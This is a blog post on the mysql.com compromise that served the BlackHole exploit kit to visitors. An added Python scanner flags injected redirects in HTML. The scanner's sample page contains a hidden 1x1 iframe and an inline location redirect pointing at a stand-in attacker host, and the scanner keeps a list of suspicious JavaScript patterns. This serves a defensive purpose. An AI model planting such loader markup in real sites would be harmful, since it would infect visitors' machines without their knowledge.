I received an alert this afternoon that actually took me by surprise.
A security firm revealed today that mysql.com, the central repository for widely-used Web database software, was hacked and booby-trapped to serve visitors with malicious software. The disclosure caught my eye because just a few days ago I saw evidence that administrative access to mysql.com was being sold on the hacker underground for just $3,000.
This wasn’t idiot malware either, the kind where people are conned into clicking through a dialog box.
Web security firm Armorize stated in its blog that mysql.com was poisoned with a script that invisibly redirects visitors to a Web site that uses the BlackHole exploit pack, an automated exploit toolkit that probes visiting browsers for a variety of known security holes.
“It exploits the visitor’s browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java, …), and upon successful exploitation, permanently installs a piece of malware into the visitor’s machine, without the visitor’s knowledge,” say the researchers. “The visitor doesn’t need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.”
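For a site operator who wants to check whether their own pages carry an injected redirect of the kind described above, here is an added example (not code from the original post or from Armorize) that flags the markup such an injection typically leaves behind: off-site script and iframe sources, hidden iframes, and inline scripts that rewrite the location. The host names and the sample page are constructed for the demonstration.

```python
"""Flag markup that resembles an injected drive-by redirect (detection only)."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class InjectScanner(HTMLParser):
    """Collects findings: off-site scripts/iframes, hidden iframes, inline redirects."""
    SUSPECT_INLINE = ("location.href", "window.location", "document.write", "eval(")

    def __init__(self, site_host, allowed_hosts=()):
        super().__init__()
        self.allowed = set(allowed_hosts) | {site_host}  # hosts we expect to load from
        self.findings = []
        self._in_script = False

    def _offsite(self, url):
        host = urlparse(url).hostname  # None for relative URLs such as /js/site.js
        return bool(host) and host not in self.allowed

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if a.get("src") and self._offsite(a["src"]):
                self.findings.append(("offsite-script", a["src"]))
        elif tag == "iframe":
            src = a.get("src", "")
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                      or "display:none" in style or "visibility:hidden" in style)
            if hidden:  # a 1x1 or invisible frame is the classic exploit-kit loader
                self.findings.append(("hidden-iframe", src))
            elif self._offsite(src):
                self.findings.append(("offsite-iframe", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies here; look for location rewrites.
        if self._in_script and any(k in data for k in self.SUSPECT_INLINE):
            self.findings.append(("inline-redirect", data.strip()[:60]))


def scan_html(html, site_host, allowed_hosts=()):
    """Return a list of (kind, detail) findings for one fetched page."""
    p = InjectScanner(site_host, allowed_hosts)
    p.feed(html)
    return p.findings


# Constructed sample page: legitimate assets plus an injected hidden iframe and
# an inline location rewrite. All host names are made up for this example.
SAMPLE = """<html><head><script src="/js/site.js"></script>
<script src="https://cdn.example-allowed.test/lib.js"></script></head><body>
<p>Welcome</p>
<iframe src="http://evil.example.test/kit/" width="1" height="1" style="display: none"></iframe>
<script>window.location = "http://evil.example.test/landing";</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE, "www.example.test", ["cdn.example-allowed.test"]):
        print(kind, detail)
```

Run it against a page fetched from your own site and treat any finding that is not in your allow-list as something to investigate, not as proof of compromise on its own.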
This type of exploit is still easily defensible by using the proper browser plugins, such as NoScript and AdBlock, and making sure they are in a default-deny state. Remember that just because you trust a site today doesn’t make it trustworthy tomorrow. Be cautious and be aware. Condition yellow applies to the internet just as it does in reality.
If you can do your web browsing through a VM you might want to do exactly that. I did do that for a long time, but eventually laziness won since it didn’t actually get me much in the way of extra security. I’ve seen how easily something can go bad without doing anything questionable. I had malware, which was thankfully caught, that tried to install itself when I clicked to look at a screenshot of an upcoming game on a Google image search.
If you’ve been to MySQL.com recently, make sure to check your machine out. I have a feeling this site was targeted the way it was because most of the people who visit it are likely to have elevated privileges on other systems. While most of those visitors will be security savvy, many would also have been trusting due to who the host was.